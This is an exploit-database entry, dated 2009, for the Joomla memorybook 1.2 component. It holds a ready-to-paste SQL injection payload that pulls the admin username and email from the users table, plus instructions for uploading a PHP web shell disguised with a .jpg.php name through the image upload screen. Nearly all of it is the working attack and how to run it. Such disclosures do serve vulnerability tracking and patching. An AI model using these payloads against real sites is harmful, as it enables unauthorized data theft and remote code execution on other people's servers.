[] NeoSense

Joomla! Component memorybook 1.2 - Multiple Vulnerabilities

Author: jdc
type: webapps
platform: php
port: 
date_added: 2009-12-26 
date_updated:  
verified: 0 
codes: OSVDB-61452;OSVDB-61451 
tags: 
aliases:  
screenshot_url:  
application_url: 

SQL Injection
-------------

requires: magic quotes OFF, user account

Add this as the description of a new event:

'), ( 63,(SELECT CONCAT(username,0x20,email) FROM #__users WHERE gid=25
LIMIT 1),1,1,1) -- '

NOTE: 63 MUST be your Joomla user ID. extracted info can be found on
View Events page


Remote File Inclusion
---------------------

requires: user account

Just upload your PHP shell (shell.jpg.php) through the Add Image screen,
and find it's new URL in the View Images screen.